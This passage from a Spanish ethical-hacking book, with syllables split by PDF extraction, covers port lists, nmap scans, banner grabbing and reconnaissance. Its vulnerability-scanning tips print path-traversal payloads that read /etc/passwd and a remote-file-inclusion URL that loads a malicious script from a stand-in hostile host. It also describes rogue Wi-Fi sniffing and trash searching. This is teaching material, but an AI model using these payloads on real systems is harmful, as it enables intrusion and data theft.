118 SQL Ser vi ces 119 News group (NNTP) 137 Net BIOS Na me Ser vi ce 139 Net BIOS Da ta gram Ser vi ce 143 In te rim Mail Ac cess Pro to col (IMAP) 150 Net BIOS Ses sion Ser vi ce 156 SQL Ser ver 161 SNMP 179 Bor der Ga te way Pro to col (BGP) 190 Ga te way Ac cess Con trol Pro to col 194 In ter net Re lay Chat (IRC) 197 Di rec tory Lo ca tion Ser vi ce (DLS) 389 Light weight Di rec tory Ac cess Protocol 396 No vell Net wa re over IP 443 HTTPS 444 Sim ple Net work Pa ging Pro to col 445 Mi cro soft-DS 458 Ap ple Quick Ti me

65

Pa ra co no cer más so bre el com por ta mien to a ba jo ni vel de las apli ca cio nes y sis te masope ra ti vos y la interactuacion de protocolos y capas, visiten: www.syn nergy .net /down -loads /pa pers/ o vi si tar www.hpn-sec .net /deat h/ar ti cles /sa bue sos /Sa bue sos.pdf ywww .hackpr .net /fi les /tex t/a na li sis-re mo to-de-sis te mas.txt.

Ma te rial adi cio nal sobre escaneos

Hacking Etico - [PDF Document] (69)

546 DHCP Client 547 DHCP Ser ver 563 SNEWS 569 MSN 1080 Socks

Puertos. Well known ports. Puer tos co no ci dos has ta 1024, re ser va dospa ra ser vi cios de pri vi le gio. La lis ta com ple ta de puer tos re gis tra dos

o pri va dos y di ná mi cos es tá en ww w.ia na.or g/as sign ments /port-num bers.

No po de mos de ta llar aquí có mo se com por tan a ba jo ni vel todas las apli ca cio -nes y sis te mas ope ra ti vos, ni có mo in te rac túan los pro to co los de co mu ni ca cióny sus ca pas, ya que no que da ría es pa cio pa ra de ta llar las téc ni cas bá si cas de hac -king éti co. Por ello, a lo largo de toda la obra iremos recomendando una se riede re cur sos a los que se pue de acu dir pa ra ob te ner más ma te rial. La ma yo ría de esos mé to dos se lle va a ca bo con las he rra mien tas que ofre ce el ex ce len -te Nmap. En cuan to al vul ne ra bi lity scan ning, si bien es re co men da ble ha cer lo a ma -no se gún el sis te ma –apps, pla ta for ma y ver sion-, po de mos uti li zar pro duc tos de ww -w.ee ye .com y ww w.app se cinc .com. En tre otros, es po si ble usar Nes sus (www .nes su -s.org /down loa d/in dex.php), scripts en Perl, Pyt hon y apli ca cio nes tan to open sour ceco mo win32. que al ser és tos co mer cia les, se de be rá pa gar una li cen cia pa ra su uti li za -ción.

NMAP. Aquí se ve la eje cu ción de nmap con tra un host, dan do co mo re sul ta dolos ser vi cios dis po ni bles (puer tos abier tos y uno fil tra do), su di rec ción IP y su es ta do Up.

La ins ta la ción de nmap es muy sim ple. Lue go de des car gar lo des de htt p://in se cu -re.org/n map /down load.html, bas ta con ha cer do ble clic so bre el ins ta la dor en ca -so de que sea la ver sión Win dows. Pa ra las ver sio nes de Unix, Li nux y So la ris, lue -

66

Hacking Etico - [PDF Document] (70)

go de des com pri mir el ar chi vo y me ter se en su path (di rec to rio), in gre sa mos:

$ ./con fi gu re$ ma ke$ ma ke ins tall

Aun que po de mos con sul tar el man (ayu da) de nmap o en una lis ta de co rreo, co -mo http://c gi.in se cu re.org /mail man /lis tin fo/n map-hac kers, vea mos unos ejem -plos de es ca neos en nmap (reem pla zar IP con la di rec ción co rrec ta):

• Lis ta do de puer tos: nmap –sS IP• Ba rri da de ran go: nmap –sS 200.**.0.2-200 (es ca nea ese ran go de 2 a 200).• Ba rri da de ran go bus can do los puer tos SSH, Net bios, FTP y Tel net: nmap –sS–p 22,21,139,23 200.**.0.2-200

• Ob te ner sis te ma ope ra ti vo: nmap -O –v IP• Ver sio nes de ser vi cios: nmap -T Ag gres si ve -sV -n -O –v IP

GUI. UMIT (htt p://u mit .sour ce for ge .net), la agradable in ter faz grá fi ca pa ra nmap.Ahora llamada Zenmap.

Aho ra vea mos una se rie de con se jos en cuan to al vul ne ra bi lity scan ning o bús que dade vul ne ra bi li da des de mo do au to ma ti za do con un es cá ner (del ti po Re ti na):• Hay que en ten der qué es lo que bus ca es ta he rra mien ta (prin ci pal men te te nercla ro el con cep to com ple to so bre vul ne ra bi li da des, sus cla ses e im pac to en lo téc -ni co), que fun ción cum ple en nues tro tra ba jo y qué pue de brin dar nos su bús que da

67

Hacking Etico - [PDF Document] (71)

co mo re sul ta do. Es ca near sin más no tie ne sen ti do en un che queo de se gu ri dad se rio.

• No hay que po ner lo a fun cio nar con una con fi gu ra ción por de fec to. Estosignifica que la he rra mien ta de be es tar siem pre ade cua da al ob je ti vo. Si bienexis ten in fi ni dad de he rra mien tas, en su mó du lo de se teo (Set tings u Op cio -nes) o bien en el mis mo có di go fuen te, a la ma yo ría se le pue de op ti mi zar susdic cio na rios (cam biar ad mi nis tra tor por ad mi nis tra dor por ejem plo en un ca -so de fuer za bru ta) si el sis te ma ob je ti vo es tá en idio ma es pa ñol de bi do a suscuen tas de sis te ma. Si es ta he rra mien ta rea li za bús que da de di rec to rios, de be -rá ser am plia do so bre su pro pia ba se, ali near lo a los po si bles paths que pue dalle gar a te ner el si tio y que, de mo men to, des co no ce mos.

• No con fiar ple na men te en to do el out put o re sul ta do del aná li sis (por losfal sos po si ti vos y los erro res no re por ta dos).

• Che quear co sas a ma no (tel ne tear, bus car in for ma ción o ge ne rar erro res a ma -no), ya que no existe ninguna he rra mien ta que se com pa re, si quie ra mí ni ma men -te, a nues tra ima gi na ción.

• Des car tar los mó du los de che queo de la he rra mien ta, donde ob via men te,esas vulnerabilidades no se encuentran por lógica en el ob je ti vo. Es to espa ra no DO Sear lo (crear le de nia les de ser vi cio no es pe ra dos, con ges tio nar lo).Por ejem plo: no va le la pe na es ca near por vul ne ra bi li da des en Apa che si nues troweb ser ver es un IIS. En es te ca so, de be ría mos des ha bi li tar (en ca so de que lo tu -vie ra) el mó du lo Apa che de nues tra he rra mien ta.

• Uti li zar va rias he rra mien tas o pro duc tos: co mer cia les, open sour ce y pri va -dos. En lo po si ble conviene hacerlo des de di fe ren tes pla ta for mas y sis te mas ope -ra ti vos. Ca da uno po see su ver sa ti li dad y re cur sos.

• In yec tar to do ti po de co sas en los querys php, des de ca rac te res es pe cia les has -ta di rec cio nes web con scripts que eje cu ten co man dos, de mo do au to ma ti za do ya ma no. Es tos querys son las lla ma das ha cia ar chi vos o va ria bles que ha cen al gu -nos scripts .php en el ser vi dor, co mo por ejem plo: si tio vic ti ma /fi le.ph p?id=34(lla ma a una va ria ble), si tio vic ti ma /fi le.php ?fi le=en cues ta.htm (lla ma a un ar -chi vo). Su pon ga mos que lue go del ca rác ter = co lo ca mos co mi llas sim ples oURLs con scripts pa ra eje cu tar co man dos en el ser vi dor o, sim ple men te, ge ne rarerro res y ver qué in for ma ción nos de vuel ve es te ob je ti vo. Que da ría al go así en elbrow ser, lue go de lo que pre sio na mos la te cla En ter:

si tio vic ti ma /fi le.php ?fi le=’si tio vic ti ma /fi le.php ?fi le=../../../../../etc /passwdsi tio vic ti ma /fi le.php ?fi le=/etc /passwd00%si tio vic ti ma /fi le.php ?fi le=www .si tio de po ra hi .com/s cript ma lig no.phpsi tio vic ti ma /fi le.php ?fi le=www .si tio de po ra hi .co m/ar chi voa su bir .gifsi tio vic ti ma /fi le.php ?fi le =si tio vic ti ma /fi le.php

68

Hacking Etico - [PDF Document] (72)

si tio vic ti ma /fi le.php ?fi le =fi le.phpsi tio vic ti ma /fi le.php ?fi le =cual quier co sa pa ra ge ne rar erro res o lo grar al -go ines pe ra do en la apli ca ción

Nin gu na he rra mien ta de bús que da au to ma ti za da de vul ne ra bi li da des se com pa raa la ima gi na ción y re so lu ción de un hu ma no en es te ti po de ta rea. La herramientase rá rá pi da y se cuen cial, pe ro es in ca paz de dis cer nir qué error co me tió el pro gra -ma dor o el ad mi nis tra dor. Só lo en con tra rá des cui dos tí pi cos, po si bles, co no ci dosde an te ma no. Un che queo de se gu ri dad ba sa do só lo en he rra mien tas, sis te masope ra ti vos y ex ploits, sin una men te ana lí ti ca (o va rias) de trás, no es más que unche queo de des cui dos tí pi cos. Los des cui dos más im por tan tes son los que sonfru to de ese sis te ma y las par tes in vo lu cra das. En tre los des cui dos tí pi cos, po de -mos men cio nar: si tio vic ti ma /ro bots.txt, si tio vic ti ma /bac kup/ y si tio vic ti -ma/u ploa d.asp.

• Pro bar téc ni cas de eva sión, de mo do au to ma ti za do y a ma no.• Pla ni fi car un mo de lo /pa trón de bús que da. Si es un ob je ti vo on li ne (si tio) pa -ra ven ta de ca cho rros (pe rros), bus car los po si bles paths /ca cho rros/, /bac kupca nes/, /can/, ar chi vos co mo: pla ni lla _pe rros.xls, pe rros.mdb, ba se-pe rros.mdby así has ta don de nos per mi ta la ima gi na ción o el tiem po. En el mis mo ejem plo,co mo pass words de usua rios de co rreo le agre ga mos a la he rra mien ta de com pro -ba ción la lis ta de pe rros de la aso cia ción ca ni na mun dial más sul tan, boby, ne gra,mo ra, chun chu na, ati la, en tre otros más co mu nes co mo las sie, rin tin tin y lai ka.

• Lue go de lo pla ni fi ca do, in ten tar otras co sas so bre la ba se de aquello quesur ja y to mar apun tes, ana li zar re sul ta dos en to dos los tiem pos (an tes, du ran te ydes pués).

69

La apli ca ción de la Fi gu ra 13 se lla ma R3x, era gra tui ta en 1999. Fue de sa rro lla da porel ru ma no Bod gan Ca lin, con quien co la bo ré co mo be ta tes ter re por tan do sus fal sos po -si ti vos. En la ac tua li dad, su nue vo nom bre es GFI LAN guard Net work Se cu rity Scan ner,y se tra ta de una he rra mien ta co mer cial mu cho más com ple ja y re co no ci da.

Anéc do ta

Hacking Etico - [PDF Document] (73)

R3X. Ejem plo de un es ca neo de re cur sos com par ti dosa tra vés de net bios y su vi sua li za ción re mo ta a tra vés de In ter net Ex plo rer.

La bús que da de la vul ne ra bi li dad o des cui do de be ser ló gi ca e iló gi ca, ya que és tos pue -den ser gro tes cos o su ti les. Po ner se a pen sar y pla ni fi car en es te as pec to una ho ra an -tes de ha cer la emu la ción del em ba te, pue de aho rrar nos trein ta lue go del co mien zo.

TelneteoEsto es la bús que da a ma no, de ban ners y otra in for ma ción.Tel ne tear es un mo dis mo que sig ni fi ca uti li zar un clien te tel net (apli ca ción pa raeje cu tar co man dos tel net) a tra vés de una lí nea de co man dos (ya sea un promptMS-DOS o una shell li nux o unix), pa ra co nec tar se a ser vi cios (puer tos) de un sis -te ma re mo to y así ob te ner in for ma ción de és te o a tra vés de és te.Va ya mos al prin ci pio. Con un clien te tel net no po dre mos co nec tar nos a un ser vi -dor SSH (puer to 22, por de fec to) y man te ner una se sión nor mal. Son di fe ren tespro to co los, y siem pre hay que res pe tar el pro to co lo. No se pue de co nec tar viaclien te FTP a un puer to ser vi dor POP3, ya que ello se ría co mo que rer trans mi tiragua por los ca bles de elec tri ci dad. Por otro la do, un puer to abier to no es si nó ni -mo de un puer to por don de se pue de en trar li te ral men te al ser vi dor o al gún com -po nen te ope ra ti vo del sis te ma. Es so la men te un ser vi cio que, en el ca so de re que -rir au ten ti fi ca ción (que de ba co lo car se allí nom bre y pass word pa ra ini ciar una se -sión en el sis te ma), de be rá uti li zar se un clien te ade cua do y su co rrec ta sin ta xis pa -ra su co ne xión en el ser vi dor y po der así, man te ner una se sión nor mal.

70

Hacking Etico - [PDF Document] (74)

Prompt. Po werCmd (www .po wercmd .com) es una he rra mien ta que po dríareem pla zar de un mo do me jo ra do al in tér pre te de co man dos de Win dows (cm d.e xe).Po see un sis te ma de re gis tros au to ma ti za dos y edi ción de tex to, co mo tam biénsu ge ren cias en tiem po real y un en tor no agra da ble a la vis ta, en tre otras co sas.

Tel ne tear sir ve en ton ces só lo pa ra mi rar qué hay en ese ser vi cio, y ge ne ral men te seven só lo los ban ners, que son unos pe que ños car te les con in for ma ción delser vi cio, una bien ve ni da, al gún que otro da to im por tan te (co mo pa sa en el puer tode fin ger 79) o na da. Ló gi ca men te, no se va a tel ne tear a un puer to que apa re ce co -mo ce rra do fil tra do o ce rra do lue go de un es ca neo de nmap. Cuan do se co nec ta el clien te tel net a un puer to abier to, la ma yo ría de las ve ces da lain for ma ción sin in tro du cir más que un En ter, un /w y en ter en el ca so de al gu nosser vi cios Fin ger, un help o ? en otros. Pa ra en ten der lo, vea mos al gu nos ejem plos.

• Al ser vi cio FTP:co ne xión: tel net ip vic ti ma 21res pues ta: 220 do mi nio vic ti ma .co m.ar FTP ser ver (Ver sionwu-2.6.2(2) Mon Aug 25 15:08:21 ART 2003) ready.Aquí ve mos que nos da la ver sión y el nom bre del ser vi dor, des de 220 has ta readyes el ban ner mos tra do.

• Al ser vi cio tel net (puer to 23):

71

Hacking Etico - [PDF Document] (75)

co ne xión: tel net ip vic ti mares pues ta: Tr ying ip vic ti ma...Con nec ted to ip vic ti ma.Es ca pe cha rac ter is ‘^]’.** AC CE SO RES TRIN GI DO A TO DO USUA RIO AJE NO A XXXX **User na me: ad minPass word:Aquí po de mos ver que es un ser vi dor en el que se pue de au ten ti fi car re mo ta men -te, y su car tel de avi so o ban ner de au ten ti fi ca ción.

• Al ser vi cio SSH que se en cuen tra por de fec to en el puer to 22:co ne xión: tel net ip vic ti ma 22res pues ta: SSH-2.0-OpenSSH_3.8.1p1Pro to col mis match.Se ha per di do la co ne xión con el host.Aquí da la ver sión y el ti po de ser ver SSH.

• Al ser vi cio Fin ger (puer to 79):Ejem plo 1:Co ne xión: tel net ip vic ti ma 79Res pues ta:

Tr ying ip vic ti ma...Con nec ted to ip vic ti ma.Es ca pe cha rac ter is ‘^]’.

**************************************************************************** **** Bien ve ni do a In ternet ** XXXXX ** ****************************************************************************

NO DO XXX

Li ne User Host(s) Id le Lo ca tion* 66 vty 0 id le IP CO NEC TA DACon nec tion clo sed by fo reign host.

Ejem plo 2:

72

Hacking Etico - [PDF Document] (76)

Co ne xión: tel net ip vic ti ma 79Res pues ta:

Tr ying ip vic ti ma...Con nec ted to ip vic ti ma.Es ca pe cha rac ter is ‘^]’.

Li ne User Host(s) Id le Lo ca tion* 66 vty 0 id le 00:00:00 IP CO NEC TA DA

In ter fa ce User Mo de Id le Peer Ad dressSe0/1 Sync PPP 00:00:00 10.10.0.4Se0/3 Sync PPP 00:00:03 10.10.0.9

To da es ta in for ma ción que nos mues tran los ser vi cios o puer tos tel ne tea dos es im -por tan te pa ra dis cer nir có mo se guir el ata que o pro ce di mien to de che queo. El in -tru so, pa ra tel ne tear, es muy pro ba ble lo haga des de una shell in ter me dia a su má -qui na, es de cir, que pri me ro se co nec te a una má qui na (o más) que se en cuen trepre via men te com pro me ti da y que, des de ahí, tra te de ver ca da uno de los ser vi ciosdel ob je ti vo (pri me ro es ca nean do to dos sus ser vi cios dis po ni bles, lue go a ma noaque llos que con si de re in te re san tes pa ra ver de te ni da men te). Lo ha ce de es ta ma -ne ra pa ra sal va guar dar su iden ti dad en la red y no de jar su real IP gra ba da en el ob -je ti vo. Él in tru so po see to do el tiem po del mun do pa ra es te ti po de bus que da ar te -sa nal, a com pa ra ción de los tiem pos y otros re cur sos aco ta dos que tie nen los con -sul to res o pen tes ters de una or ga ni za ción for mal. Ésa es otra de las ven ta jas que es -te ti po de ata can tes tie ne si com pa ra mos el em ba te en tre uno y otro.Por tal mo ti vo, es re co men da ble que las or ga ni za cio nes man ten gan el con trol de lase gu ri dad me dian te cons tan tes con tro les y che queos, y no só lo por úni ca vez o demo do aco ta do por lap sos ho ra rios. Por ejem plo, una pau ta con el con sul tor del ti -po Pe ne tra tion test de só lo 80 ho ras.En las téc ni cas a ma no, no es re co men da ble guiar se el 100% en whi te pa pers o du -do sos tu to ria les que en con tra mos por ahí, si no que siem pre hay que in ten tar al go

73

Co mo clien te de co ne xión del ti po tel net, SSH o rlo gin, es re co men da ble la muy útilapli ca ción Se cu reCRT (www .vandy ke .com). Pa ra ana li zar ser vi cios dis po ni bles enpuer tos no ha bi tua les (por ejem plo SSH en el puer to 1255 ), AMAP de THC, cu yo si tio dedes car ga es: http ://free world.th c.org/thc-amap/.

Pro gra mas re co men da dos

Hacking Etico - [PDF Document] (77)

di fe ren te. De be mos te ner pa cien cia y uti li zar la ima gi na ción, el sen ti do co mún, serin tui ti vos o in no va do res y cul ti var nos.

Pe ti cio nes HTTPEn el che queo de se gu ri dad o bien en la emu la ción del ata que, es vi tal re co no cerla im por tan cia que tie ne el ge ne rar erro res y des cu brir co sas ocul tas en el ob -je ti vo. Mu chas de és tas pue den lo grar se a tra vés del puer to 80, que es el ser vi dorweb don de se alo ja co mún men te el si tio de la or ga ni za ción o un si tio que es tá enese mis mo ser vi dor, en el que se en cuen tra par te de la in for ma ción que bus ca mos.

Me dian te una pe ti ción http (usan do el brow ser In ter net Ex plo rer o una lí nea deco man dos, por ejem plo), se pue de en con trar in for ma ción muy im por tan te delob je ti vo y lle var a ca bo al gu nos ata ques o che queos muy in te re san tes. Aun quemu chos de ellos los ire mos vien do en de ta lle a lo lar go del li bro, aquí men cio -na mos al gu nos ejem plos sim ples:

• Des cu brir si el ob je ti vo es vul ne ra ble a SQL in jec tion co lo can do una co mi lla sim -ple en el for mu la rio de lo gin o string del URL.

• Bus car di rec to rios (paths /car pe tas /fol ders) ocul tos. • Sub do mi nios ocul tos, in tra nets, ex tra nets.• CGIs co no ci dos o no, XSS.• Paths con / al fi nal (no es lo mis mo si tio .com /path que si tio .com /path/).• Pa ne les de ad mi nis tra ción web, ftp, de co rreo u otra apli ca ción ins ti tu cio nal o pri -va da de de sa rro llo in ter no.

• Apli ca cio nes pa ra su bir (upload) ar chi vos.• Re po si to rios de ar chi vos con fi den cia les o no, ocul tos o no.• Ar chi vos tí pi cos co mo ro bots.txt, que lis tan paths pú bli cos y ocul tos en el ser vi -dor.

• Có di go fuen te de la pá gi na.• Se pue den in yec tar scripts re mo tos.

74

CURL (http ://curl .haxx .se) es una lí nea de co man do pa ra trans fe rir ar chi vos con una sin ta -xis URL, so por tan do FTP, FTPS, HTTP, HTTPS, SFTP, TFTP, LDAP, LDAPS . Curl so por tacer ti fi ca dos SSL, HTTP POST, HTTP PUT, FTP uploa ding, HTTP form ba sed upload, pro xies,coo kies, au ten ti fi ca ción user +pass word, fi le trans fer re su me, proxy tun ne ling y otros.

He rra mien ta útil

Hacking Etico - [PDF Document] (78)

• Se pue den in yec tar co man dos.• Se pue den in yec tar coo kies.• Se pue de ha cer un fi le re trie ve, o ex traer /leer ar chi vos del sis te ma ope ra ti vo.• Se pue den tras pa sar di rec to rios.• Sal tar con tro les de in gre so de da tos con un proxy.• Se pue de reem pla zar pa rá me tros del URL pa ra ge ne rar más erro res.• Ba jar ar chi vos bi na rios o de otro ti po pa ra ana li zar.• Se pue den en con trar ges to res de ar chi vos.• Otros, co mo por ejem plo pro bar me ter da tos vía POST dan do clic en el bo tónde Acep tar y lue go dan do En ter, vien do si hay di fe ren cia en la com pro ba ción, oha cer re trie ve de al gu na cla ve o in for ma ción adi cio nal.

Ten ga mos en cuen ta que un si tio web no tie ne gran im por tan cia en prin ci pio co -mo ob je ti vo, a me nos que el in tru so se pa lo que ha ce y que es te si tio ten ga las ca -rac te rís ti cas que vemos a continuación:

• Que es té alo ja do en una red de la or ga ni za ción o bien por allí pa sen to dos lose-mails de és ta (que sea si mul tá nea men te ser vi dor web y de co rreo).

• Que en ese ser vi dor las cuen tas de sis te ma sean si mi la res a las de otro ser vi dormás crí ti co en otro pun to de la red y aquí sea más fá cil ex traer las cuen tas u otrain for ma ción pa ra uti li zar en ese otro sec tor.

• Que sir va de ne xo pa ra in tro du cir se a la red in ter na des de el ex te rior (In ter net).• Que sea útil co mo pun to de cap tu ra me dian te snif fers de to do lo que sa le des dela or ga ni za ción ha cia In ter net o que sea de pó si to mo men tá neo de ar chi vos ex -traí dos des de la red in ter na de la or ga ni za ción.

• Que tam bién sea uti li za do co mo ser vi dor de spoo fing /hi jac king /man-in-the-midd le pa ra ac ce der a re cur sos con de ter mi na das re glas de ac ce so en la red in ter -na, o pa ra bur lar me ca nis mos de iden ti fi ca ción de in tru sos si los hu bie ra.

Si bus ca mos URLs al azar me dian te Goo gle, ade más del mé to do de en viar los a unaho ney pot, Goo gle po drá di rec ta men te mos trar nos un avi so co mo el si guien te: Losen ti mos... pe ro en es tos mo men tos no po de mos pro ce sar su so li ci tud. Unvi rus de or de na dor o soft wa re es pía nos es tá man dan do so li ci tu des au to má -ti cas y, al pa re cer, su red o su equi po ha si do in fec ta do. Te ne mos que tra tar de en ten der có mo es el sis te ma ope ra ti vo, qué erro res pu do ha berco me ti do su ad mi nis tra dor o pro gra ma dor web y pres tar aten ción a sus apli ca cio nes,las que de ser po si ble, se ría bue na idea pro bar las an tes en nues tra pro pia má qui na. Unaex ce len te cos tum bre prác ti ca es ins ta lar se un ser vi dor de prue ba en ca sa o en el tra ba -jo.

75

Hacking Etico - [PDF Document] (79)

Da tos en ar chi vos bi na rios y otros Los si tios de las or ga ni za cio nes sue len te ner en su web ar chi vos (en for ma to pdf, doc,xls o exe) que con tie nen di ver sa in for ma ción, co mo pre sen ta cio nes, bro chu res, tra -ba jos de las más di ver sas ín do les, o apli ca cio nes. El aná li sis de es tos ar chi vos pue debrin dar nos al gu nas pis tas so bre la or ga ni za ción o par te de ella. Por ejem plo, los au -to res de esos do cu men tos pue den ser em plea dos ac tua les que tie nen una cuen ta shellen el ser vi dor u otra ter mi nal de la red que ya he mos ma pea do e in di vi dua li za do enIn ter net.

Metadatos. Pro pie da des de un ar chi vo de Word ba ja do de un si tio, cu yo au tores un com po nen te de la su pues ta or ga ni za ción ob je ti vo y, pro ba ble men te, ten gauna cuen ta lla ma da jpe rez en al gún ser vi dor, ter mi nal o apli ca ción de la com pa ñía.

El mis mo ti po de aná li sis pue de lle var se a ca bo en ar chi vos bi na rios del ti po .exe yaque és tos, si es tán mal di se ña dos o pro te gi dos, nos da rán al gún path, cuen ta de usua -rio, o bien pis tas so bre el au tor o quién lo de sa rro llo y la pla ta for ma de su ter mi nal.

76

Al gu nas he rra mien tas pa ra lle var a ca bo el aná li sis de los da tos de los ar chi vos pue -den ser en con tra das bus cán do las ba jo el tér mi no me ta da ta ex trac tor en Goo gle o bienen di rec cio nes como www.edge-security.com/metagoofil.php, www .re mo te-ex ploi -t.org /co des_wyd.html y www .da ta res cue .co m/i da ba se/in dex.htm.

He rra mien tas para extraer y analizar metadata

Hacking Etico - [PDF Document] (80)

Information Gathering en la vida real.Si el in tru so es muy per se ve ran te o ha ce uso de téc ni cas ex haus ti vas, tra ta rá de ob -te ner da tos de la or ga ni za ción en me dios, lu ga res y re cur sos de la vi da real. Es tosig ni fi ca que lo ha rá fue ra de In ter net o bien uti li zan do tec no lo gía ba sa da en és ta,pe ro lle va da al con tex to fí si co y cer ca no del ob je ti vo. La más co mún es:

• Bus car da tos de la or ga ni za ción o com po nen tes de ella en pe rió di cos, re vis tas, ca -tá lo gos e im pre sos de to do ti po. Con sul tar en la bi blio te ca u otros cen tros de in -for ma ción ar chi va da en pa pel o mi cro film.

• Lla mar por te lé fo no. No ne ce sa ria men te ha cien do In ge nie ría So cial. Se pue de lla -mar y pre gun tar da tos con cre tos, di rec tos.

• En viar co rreo or di na rio pos tal con con sul tas o re cur sos pa ra ob te ner in for ma -ción me dian te mal wa re u otra téc ni ca.

• Vi si tar en per so na la or ga ni za ción. • Re vi sar la ba su ra (tras hing) pa ra en con trar im pre sos des car ta dos, CD ra ya dos (és -tos se leen fá cil men te con el soft wa re Any Rea der), bus car im pre sio nes tri tu ra dasen ti ras (son fá cil men te re cu pe ra bles con al go de pa cien cia y una pin za del ti popa ra de pi la ción), ano ta cio nes con pass words o co rreos, mem bre tes de la or ga ni -za ción, po lí ti cas y un sin fin de ma te rial de se cha do que pue de ofre cer dis tin to ti -po de in for ma ción acer ca del ob je ti vo.

• Ins ta lar uno o va rios no dos wi re less cer ca de la or ga ni za ción pa ra que sea uti li za -do por los em plea dos con no te books y que así pue dan ser sni fea dos, co mo tam -bién otras téc ni cas más di rec tas y me nos pa si vas co mo el war dri ving (ac ción dede tec tar re des ina lám bri cas in se gu ras, re co rrien do la ciu dad o el ba rrio con las he -rra mien tas ade cua das), com pro me tien do o ana li zan do re cur sos Wi Fi.

77

Desde www .rexs wain .com/http view.html po dre mos ana li zar las ca be ce ras http de loshosts re mo ta men te, en tre otros da tos. En el do cu men to que se ofre ce pa ra su lec tu ra enla dirección ww w.uo c.e du /mas ter s/es p/img/873.pdf, en con tra re mos mu cha in for ma ciónacer ca de las so li citu des http y su en tor no en apli ca cio nes, de sa rro llo y mo to res.

Aná li sis de ca be ce ras http

Hacking Etico - [PDF Document] (81)

Anyreader. Apli ca ción que pue de ex traer in for ma ción de dis cosda ña dos (CD, DVD, dis quet te, uni dad de red con trans fe ren cia in con sis ten te).Muy útil a la ho ra de ex traer da tos de uni da des des car ta das a la ba su ra.

• Otros mé to dos: sue len ser uti li za dos por miem bros de or ga nis mos de se gu ri dad uor ga ni za cio nes in for ma les con re cur sos de al ta tec no lo gía, co mo la in ter cep ción dete lé fo nos de lí nea y ce lu la res, in ter cep ción de ra dia ción de mo ni to res via ea ves drop -ping (es ta téc ni ca es uti li za da pa ra ver, a la dis tan cia, aque llo que hay en un mo ni tora tra vés de la ra dia ción de es te), es cu chas a dis tan cia, in fil trar per so nal en la or ga ni -za ción o bien re la cio nar se con em plea dos de és ta en otros ám bi tos, en tre otras co -sas.

La téc ni ca In ge nie ría So cial es la más co mún de uti li zar en la vi da real pa ra ob te nerda tos o com pro me ter fá cil men te re cur sos li ga dos al sis te ma. Los de ta lles de es ta

78

Ha ce un tiempo, re por té una fa lla en un por tal la bo ral en el que ha bía 46.000 cu rrí cu lumví tae lis tos pa ra ser ba ja dos con un sim ple script. El error era de pro gra ma ción ya que, unavez lo guea do con un usua rio le gí ti mo, si uno reem pla za ba el use rID por otro use rID (en laURL li ga da a la sec ción edi ción del CV, di rec ta men te se pa sa ba a edi tar el CV aje no.

Anéc do ta

Hacking Etico - [PDF Document] (82)

téc ni ca los ve re mos en el pró xi mo ca pí tu lo.

Uti li da des IG de Back track 2.0Back track (www .re mo te-ex ploi t.org /back track.html) es una dis tri bu ción Li -veCD de Li nux, lo que sig ni fi ca que no ha ce fal ta ins ta lar el sis te ma ope ra ti voya que po de mos co rrer lo di rec ta men te des de su CD o in clu so des de un pen dri -ve. Es una dis tri bu ción crea da en es pe cial pa ra quie nes es tán re la cio na dos conla se gu ri dad in for má ti ca. De to das ma ne ras, es re co men da ble tes tear to dos losCD de boo teo orien ta dos a se gu ri dad. Se re co mien da ba jar los siem pre en sus úl -ti mas ver sio nes. Vea mos bre ve men te las uti li da des de In for ma tion Gat he ringque po de mos en con trar en Back track.

IG. Es te CD boo tea ble (de ba se Li nux), que tam bién es ins ta la ble,po see he rra mien tas muy úti les a la ho ra de ases tar un che queo de se gu ri dad.

79

Aun que la ins ta la ción de los sis te mas ope ra ti vos GNU /Li nux ya no es tan com pli ca da co moso lía ser, si que re mos ob te ner in for ma ción an tes de lle var a ca bo es ta ta rea y co no cer másde ta lles so bre las dis tri bu cio nes dis po ni bles, po de mos vi si tar sitios como www .de bia n.or -g/re lea ses/s ta ble/i386, www . dis tro watch .com o http ://ker nel fun .blogs pot .com.

GNU /LI NUX

Hacking Etico - [PDF Document] (83)

Mó du lo Ar chi veFin ger Goo gle: es una uti li dad pa ra bus car usua rios de cuen ta me dian te Goo gle.Re cur sos on li ne: ww w.ar chi ve.org

Mó du lo DNSDNS -Ptr: rea li za Querys DNS ma si vos so bre un ran go de di rec cio nes IP, trans -for mán do las a di rec cio nes web en ca so de que las ha ya.DNS-Walk: es un DNS de bug ger (http ://sour ce for ge .net /pro jects/dns walk).DNS Bru te for ce: se usa pa ra rea li zar fuer za bru ta en una re so lu ción de nom bre(www .rev hosts .net/DNS Bru te for ce).DNS Map: otra uti li dad pa ra ha cer fuer za bru ta en do mi nios. DNS Pre dict: es un script en Perl que de ter mi na nom bres DNS a tra vés de Goo gle.Dig: apli ca ción pa ra in te rro gar nom bres DNS (htt p://li nux .die .net /man /1/dig). Dns Enum: he rra mien ta es cri ta en Perl pa ra enu me rar in for ma ción en un do mi nio(www .fi lip .waey ten s.easy net .be).Host: he rra mien ta sim ple pa ra rea li zar DNS loo kups.Re cur sos on li ne: www.dns re port .com.

Mó du lo Rou teAss: pa ra de tec tar rou ters; so por ta va rios pro to co los (http://p he noe lit-us.or g/ir -pas /do cu.htm l#ass).Fi re walk: de ter mi na qué pro to co los pa san a tra vés de un fi re wall.In tra ce: es pe cie de tra ce rou te.Itra ce: rea li za tra ce rou te con pa que tes ICMP.Ne te num: pro du ce lis tas de hosts pa ra otros pro gra mas.Net mask: con si gue la net mask (más ca ra de red) a tra vés de pa que tes ICMP.Pro tos: es un es cá ner de pro to co los IP.Tc tra ce: tra cea (de tra cear, tra ce rou te) con pa que tes TCP SYN.

Mó du lo SMTPDMitry: brin da to da la in for ma ción po si ble so bre un host.Goog Mail Enum: en cuen tra e-mails de de ter mi na dos do mi nios me dian te Goo gle.

80

En www .li nux ha xor .net /2007/07/22/back track-2-all-in for ma tion-gat he ring-tools-re -vie wed, po de mos en con trar una ex ce len te re vi sión de Back track en idio ma in glés y conpan ta llas. Pa ra co no cer el de ta lle de to das las he rra mien tas de es te CD, es po si ble vi -si tar la di rec ción http :// back trac k.of fen si ve-se cu rity .co m/in dex.php ?ti tle =Tools.

In for ma ción Back track

Hacking Etico - [PDF Document] (84)

Pi ra na: es una pla ta for ma pa ra tes tear el fil tro de con te ni do de un ser vi dor de co -rreo de ter mi na do.Re lay Scan ner: es pa ra com pro bar re lay abier to en ser vi do res SMTP.SMTP Vrfy: se uti li za pa ra ve ri fi car la exis ten cia de usua rios me dian te fuer za bru -ta en un ser vi dor SMTP.Re cur sos on li ne: www.rbl s.org, www.s pam cop .net, www.s pam hau s.org.

